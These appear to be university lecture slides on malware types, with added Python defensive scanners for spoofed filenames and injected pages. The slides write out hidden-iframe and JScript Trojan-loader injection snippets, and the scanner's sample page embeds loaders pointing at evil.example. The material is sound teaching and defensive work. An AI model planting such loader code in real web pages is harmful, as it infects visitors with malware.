The Attack and Defense of Computers
Dr. 許富皓
Malware
Malicious Software (Malware):
• Security tools and toolkits
• Back doors (trap doors)
• Logic bombs
• Viruses
• Worms
• Binders
• Droppers
• Trojan Horses
• Bacteria or rabbit programs
• Spyware
• Rootkit
• URL Injection
• Dialers
• …
Security Tools and Toolkits
• Automatically scan for computer security weaknesses.
• Can be used by both security professionals and attackers.
• e.g. Nessus, COPS, ISS, Tiger, … and so on.
• Scan reports may be unwittingly released to the public.
• There are also programs and tool sets whose only function is to attack computers.
• Script kiddies
• P.S. These tools may damage the systems that install them, or may contain booby traps that compromise the systems that install them.
Logic Bombs
• A logic bomb is a piece of code intentionally inserted into a software system that sets off a malicious function when specified conditions are met.
• For example, a programmer may hide a piece of code that starts deleting files should he ever leave the company (and the salary database).
• Usually written by insiders (in-house programmers).
Logic Bombs, Viruses and Worms
• Software that is inherently malicious, such as viruses and worms, often contains logic bombs that execute a certain payload
  • at a pre-defined time, or
  • when some other condition is met.
• Many viruses attack their host systems on specific dates, such as Friday the 13th or April Fool's Day.
• Trojans that activate on certain dates are often called "time bombs".
Key Logger
• A program or hardware device that captures every key depression on the computer.
• Also known as "Keystroke Cops", they are used to monitor a user's activities by recording every keystroke the user makes, including typos, backspacing, and retyping.
Security Concerns about Key Loggers
• Keystroke logging can be achieved by both hardware and software means.
• There is no easy way to prevent keylogging software from being installed on your PC, as it is usually done by stealth.
• If you are using a home PC, it is likely to be free of any keystroke logging hardware (but remember there may be keystroke logging software).
Precautions against Key Loggers
• Try to avoid typing private details on public PCs.
• Always try to avoid visiting sites on public PCs that require you to enter your login details, e.g. an online banking account.
Example
• Ardamax Keylogger [1][2]
Dialers
• A program that
  • replaces the phone number in a modem's dial-up connection with a long-distance number, often out of the country, in order to run up phone charges on pay-per-dial numbers, or
  • dials out at night to send keylogger or other information to an attacker.
URL Injection
• Changes the URL submitted to a server, for some or all domains.
Bacteria and Rabbits
• Bacteria (also known as rabbit programs) are a type of malware that creates many instances of itself in order to consume large amounts of system resources.
• Bacteria create a denial-of-service effect, as legitimate programs may no longer be able to run, or at least may not run properly.
Definition of Binder
• A tool that combines two or more files into a single file, usually for the purpose of hiding one of them.
• A binder compiles the list of files that you select into one host file, which you can rename.
• A host file is a simple custom-compiled program that decompresses and launches the embedded programs.
• When you start the host, the embedded files in it are automatically decompressed and launched.
Example
• When a piece of malware is bound with Notepad, for instance, the result will appear to be Notepad and will appear to run like Notepad, but the piece of malware will also be run.
Program
• YAB: Yet Another Binder
• User Guide
Embedded Files
• The files embedded in a host file are not always binary files; a file of any type can be embedded.
• Even when an embedded file is a binary, it may be a normal (benign) program.
Definition of a Dropper
• A dropper is a program (malware component) that has been designed to "install" some sort of malware (virus, backdoor, etc.) on a target system.
• Single stage: the malware code is contained within the dropper itself, packaged in such a way as to avoid detection by virus scanners.
• Two stages: the dropper downloads the malware to the target machine once activated.
Types of Droppers
• Depending on how a dropper is executed, there are two major types of droppers:
  • those that do not require user interaction
    • they run by exploiting some vulnerability in the system
  • those that require user interaction, by convincing the user that the dropper is some legitimate or benign program.
Examples
• 8sec!Trojan
Trojan Horse
• In the context of computer software, a Trojan horse is a malicious program that is disguised as, or embedded within, legitimate software.
• Trojans use false and fake names to trick users into executing them.
• These strategies are often collectively termed social engineering.
• A Trojan is designed to operate with functions unknown to the victim.
• The useful, or seemingly useful, functions serve as camouflage for these undesired functions.
Properties of Trojan Horses
• Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like worms.
• Just as the Greeks needed the Trojans to bring the horse inside for their plan to work,
  • Trojan horse programs depend on actions by the intended victims;
  • if Trojans replicate and even distribute themselves, each new victim must still run the program/Trojan.
• Due to the above reasons, a Trojan horse's virulence depends on
  • successful implementation of social engineering concepts, but does not depend on
  • flaws in a computer system's security design or configuration.
Categories of Trojan Horses
• There are two common types of Trojan horses:
  • a useful piece of software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of
    • weather alerting programs
    • computer clock setting software
    • peer-to-peer file sharing utilities.
  • a standalone program that masquerades as something else, like a game or image file (e.g. firework.jpg.exe in Windows).
Malware Parasitizing inside Trojan Horses
• In practice, Trojan horses in the wild often contain:
  • spying functions (such as a packet sniffer)
  • backdoor functions that allow a computer, unbeknownst to the owner, to be remotely controlled from the network, creating a zombie computer.
• The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things.
• Because Trojan horses often have these harmful behaviors, the misunderstanding often arises that such functions define a Trojan horse.
Example of a Simple Trojan Horse
• A simple example of a Trojan horse would be a program named waterfalls.jpg.exe claiming to be a free waterfall picture which, when run, instead begins erasing all the files on the computer.
E-Mail Trojan Horses
• On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an e-mail message, enticing the recipient into opening the file.
• The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif.
• Since Windows is sometimes configured by default to hide filename extensions from the user, the Trojan horse's extension can be "masked" by giving it a name such as Readme.txt.exe.
• With file extensions hidden, the user would only see Readme.txt and could mistake it for a harmless text file.
• Icons can also be chosen to imitate the icon associated with a different and benign program or file type.
Unicode Control Character 202E Extension Spoofing [劉昱賢][1]
• This technique exploits the way the operating system interprets filenames: when it encounters a Unicode control character, it changes how the filename is displayed. An attacker can insert a specific Unicode control character into a filename so that the operating system misleads the user when it displays that name.
• Real filename: 大師兄[202E]gpj.exe
• The bracketed part is the Unicode control character 202E, an invisible control code that makes the characters after it display from right to left (Right-To-Left Override).
• When the operating system interprets and displays the filename, it shows: 大師兄exe.jpg (displayed filename)
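As an added example (not code from the slides or their author), the following Python script shows how a defender can check attachment filenames for the two tricks on the previous two slides: a double extension such as Readme.txt.exe, which Windows shows as Readme.txt when extensions are hidden, and a U+202E right-to-left override, which makes 大師兄[202E]gpj.exe render as 大師兄exe.jpg. The set of executable extensions is taken from the slide, the rendering model for the override (characters after the override are reversed until a pop-directional-formatting character or the end of the name) and the "hide known extensions" behaviour of Explorer are assumptions, and the sample filenames are constructed.

```python
"""Flag filenames that could mislead a user about what will execute.

Added example, not from the slides. Assumptions: the executable extension
list below (from the slide), Explorer hiding the last extension when the
"hide extensions for known file types" option is on, and a simple model
of how a right-to-left override is rendered.
"""
import re

# Windows executable extensions named in the slide
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".scr", ".bat", ".pif"}

# Unicode bidirectional controls: invisible, but they change display order
RLO = "\u202E"   # RIGHT-TO-LEFT OVERRIDE
PDF = "\u202C"   # POP DIRECTIONAL FORMATTING (ends an override)
BIDI_CONTROLS = {"\u202A", "\u202B", PDF, "\u202D", RLO,
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def strip_bidi(name):
    """The filename as the file system stores it, minus invisible controls."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def displayed_name(name):
    """Approximate what a bidi-aware file browser renders (assumed model).

    Characters after an RLO are drawn right-to-left (i.e. reversed) until a PDF
    or the end of the string; other controls are simply invisible.
    """
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            j = i + 1
            while j < len(name) and name[j] != PDF:
                j += 1
            out.extend(reversed(name[i + 1:j]))
            i = j + 1          # skip the PDF (or run past the end)
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def explorer_view(name):
    """What Explorer shows with 'hide extensions for known file types' on:
    the last extension is dropped, so Readme.txt.exe appears as Readme.txt."""
    clean = strip_bidi(name)
    stem, dot, _ext = clean.rpartition(".")
    return stem if dot else clean


def real_extension(name):
    """The extension the OS will actually use to pick a handler."""
    m = re.search(r"\.([A-Za-z0-9]+)$", strip_bidi(name))
    return "." + m.group(1).lower() if m else ""


def analyze_filename(name):
    """Return the real extension, the rendered name, and why it is suspicious."""
    clean = strip_bidi(name)
    ext = real_extension(name)
    shown = displayed_name(name)
    findings = []
    if clean != name:
        findings.append("bidi-control")          # invisible control characters present
    if shown != clean:
        findings.append("display-mismatch")      # rendered name differs from stored name
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append("executable")
        if clean.count(".") >= 2:
            findings.append("double-extension")  # e.g. Readme.txt.exe
    return {"real_ext": ext, "displayed": shown,
            "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    # Constructed sample attachment names (not real samples)
    for s in ["Readme.txt.exe", "大師兄\u202Egpj.exe", "report.pdf", "setup.scr"]:
        r = analyze_filename(s)
        print(f"{s!r}: Explorer shows {explorer_view(s)!r}, rendered {r['displayed']!r}, "
              f"real extension {r['real_ext']!r}, findings {r['findings']}")
```

A mail gateway or download scanner would run analyze_filename over each attachment name and quarantine anything with findings; checking the stored bytes of the name rather than its rendering is the point, since both tricks only work on what the user sees.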
Commonly Used Methods of Infection
• Websites
• E-mails
• Downloaded files
Websites
• You can be infected by visiting a rogue website.
• Internet Explorer is most often targeted by makers of Trojans and other pests, because it contains many bugs.
• Some of the bugs improperly handle data (such as HTML or images) by executing it as a legitimate program.
• Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.
Features vs. Risks
• The more "features" a web browser has, the higher your risk of having security holes that can be exploited by a Trojan horse.
• For example:
  • ActiveX objects
  • some older versions of Flash
  • Java
Example 1: Microsoft IE window() Arbitrary Code Execution Vulnerability [Secunia]
• The vulnerability is caused by certain objects not being initialized correctly when the window() function is used in conjunction with the <body onload> event.
• This can be exploited to execute arbitrary code on a vulnerable browser via specially crafted JavaScript code called directly once a site has been loaded. Example: <body onload="window();">
• Successful exploitation requires that the user is, e.g., tricked into visiting a malicious website.
• PROOF OF CONCEPT
<body onLoad=…> [HTML Code Tutorial]
• The browser triggers onLoad when the document is finished loading.
• The contents of onLoad is one or more JavaScript commands.
• So, for example, the following <BODY ...> tag tells the browser to bring up an alert box once the page is completely loaded: <BODY onLoad="alert('hello world!')">
MS IE - Crash on JavaScript window() Calling (1)
• There is a bug in Microsoft Internet Explorer which causes it to crash.
• The bug occurs because Microsoft Internet Explorer can't handle a call to a JavaScript function with the name of the "window" object, an object used in JavaScript.
MS IE - Crash on JavaScript window() Calling (2) [Symantec]
• Internet Explorer fails to properly initialize the JavaScript `Window()' function. When the 'onLoad' handler is set to call the improperly initialized `Window()' function, the web browser attempts to call the address 0x006F005B, which is derived from the Unicode representation of 'OBJECT': CALL DWORD [ECX+8]
• It is shown that JavaScript prompt boxes can be used by attackers to fill the memory region at 0x00600000 with attacker-supplied data, allowing executable machine code to be placed into the required address space.
• Crash, if the address points to non-code.
• Execution, if the address points to code.
Dangerous Web Site
• The web site pointed to by the following URL is one containing the trap described in the previous slides.
• HTTP MSIE JavaScript OnLoad Rte CodeExec [Symantec] http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
Example 2: Trojan Horse Exploits Image Flaw [Declan McCullagh et al.]
• EasyNews, a provider of Usenet newsgroups, said it has identified two JPEG images that take advantage of a previously identified flaw (a heap-based buffer overflow [Michael Cobb]) in the way Microsoft software handles graphics files.
• Windows users could have their computers infected merely by opening one of those Trojan horse images.
• Attackers tried to use these JPEGs to download Trojan horse programs to vulnerable computers.
Example 3: Compromise a Web Server and Add Hidden Download Instructions to Web Pages (網站掛馬)
• Create a frame with size 0.
Usually exploited via
• [vulnerabilities]
• [SQL injection] and similar techniques; after the page has been compromised this way, the [injected Trojan-loading code] appears in [the first or last line] of that web page.
Frame (iframe) Injection
• Part of the syntax (木馬網址 stands for the URL of the Trojan):
• <iframe src=木馬網址 width=0 height=0></iframe>
JScript File Injection
• First save the following as xxx.js (木馬網址 stands for the URL of the Trojan): document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
• Then, by whatever means are available, upload this file to the target and reference its URL.
• For example, the JScript injection syntax is: <script language=javascript src=xxx.js></script>
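The hidden-iframe and JScript injection patterns on the last three slides are easiest to catch by scanning the pages a server actually serves. The following Python scanner is an added example, not code from the slides or from any product: it parses a page with the standard library's html.parser and reports iframes with a zero size or a hidden inline style, script tags whose src is not on an allow-list the site owner maintains, and inline document.write() calls that emit an iframe, each with its line number so the "first or last line" location the slides mention can be checked. The allow-list convention, the constructed sample page and the evil.example hostname are assumptions.

```python
"""Scan served HTML for the hidden-loader patterns the slides describe.

Added example, not code from the slides or from any product. Assumptions:
the site owner keeps an allow-list of legitimate script URLs, and a
"hidden" iframe is one with width/height 0 or display:none/visibility:hidden.
"""
import re
from html.parser import HTMLParser


def _is_zero(value):
    """True for size attributes such as 0, '0', '0px' or '0%'."""
    if value is None:
        return False
    m = re.fullmatch(r"\s*(\d+)\s*(px|%)?\s*", str(value))
    return bool(m) and int(m.group(1)) == 0


def _is_hidden(style):
    """True when an inline style hides the element outright."""
    s = (style or "").replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s


class HiddenLoaderFinder(HTMLParser):
    """Collects suspicious iframes and scripts together with their line numbers."""

    def __init__(self, allowed_scripts):
        super().__init__()
        self.allowed_scripts = set(allowed_scripts)
        self.findings = []
        self._in_script = False

    def _add(self, kind, src):
        line, _col = self.getpos()            # line of the tag or data being handled
        self.findings.append({"line": line, "kind": kind, "src": src})

    def handle_starttag(self, tag, attrs):
        a = {name.lower(): value for name, value in attrs}
        if tag == "iframe":
            if (_is_zero(a.get("width")) or _is_zero(a.get("height"))
                    or _is_hidden(a.get("style"))):
                self._add("hidden-iframe", a.get("src"))
        elif tag == "script":
            self._in_script = True
            src = a.get("src")
            if src and src not in self.allowed_scripts:
                self._add("unexpected-script", src)   # e.g. an injected xxx.js

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script that writes an iframe into the page at load time.
        if self._in_script and re.search(r"document\.write\s*\(.*<iframe", data, re.I | re.S):
            m = re.search(r"src\s*=\s*['\"]?([^'\"\s>]+)", data, re.I)
            self._add("document.write-iframe", m.group(1) if m else None)


def scan_page(html, allowed_scripts=()):
    """Return findings for one page; page_edge marks the first or last line,
    where the slides say injected code usually shows up."""
    parser = HiddenLoaderFinder(allowed_scripts)
    parser.feed(html)
    parser.close()
    last_line = html.count("\n") + 1
    for f in parser.findings:
        f["page_edge"] = f["line"] in (1, last_line)
    return parser.findings


# Constructed sample page: one legitimate script, then three injected loaders.
SAMPLE_PAGE = (
    "<html><head><title>Shop</title>\n"
    '<script src="/js/app.js"></script></head>\n'
    "<body><h1>Welcome</h1>\n"
    "<p>Normal content.</p>\n"
    "<script language=javascript src=xxx.js></script>\n"
    "<script>document.write(\"<iframe width='0' height='0' "
    "src='http://evil.example/x.htm'></iframe>\");</script>\n"
    "</body></html>\n"
    '<iframe src="http://evil.example/load.htm" width=0 height=0></iframe>'
)

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, allowed_scripts={"/js/app.js"}):
        print(finding)
```

Run this over a fresh copy of each page fetched from the live server rather than over the files in the deployment repository: the slides describe the injection being planted on the server after a compromise, so the copy that reaches browsers is the one that matters.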
E-mails and Trojan Horses
• The majority of Trojan horse infections occur because the user was tricked into running an infected program.
• This is why you're not supposed to open unexpected attachments on e-mails: the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a Trojan or virus.
Microsoft Outlook
• If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly.
• The same vulnerabilities exist since Outlook
  • allows e-mail to contain HTML and images, and
  • actually uses much of the same code as Internet Explorer to process them.
Downloaded Files
• The infected program doesn't have to arrive via e-mail, though; it can be
  • sent to you in an instant message
  • downloaded from a web site or by FTP
  • delivered on a CD or floppy disk
Precautions against Trojan Horses (1)
• Trojan horses are commonly spread through e-mail, much like other common types of viruses.
• The best ways to protect yourself and your company from Trojan horses are as follows:
  • If you receive e-mail from someone you do not know, or you receive an unknown attachment, never open it right away.
  • As an e-mail user you should confirm the source.
  • P.S.: Some hackers have the ability to steal address books, so e-mail from someone you know is not necessarily safe.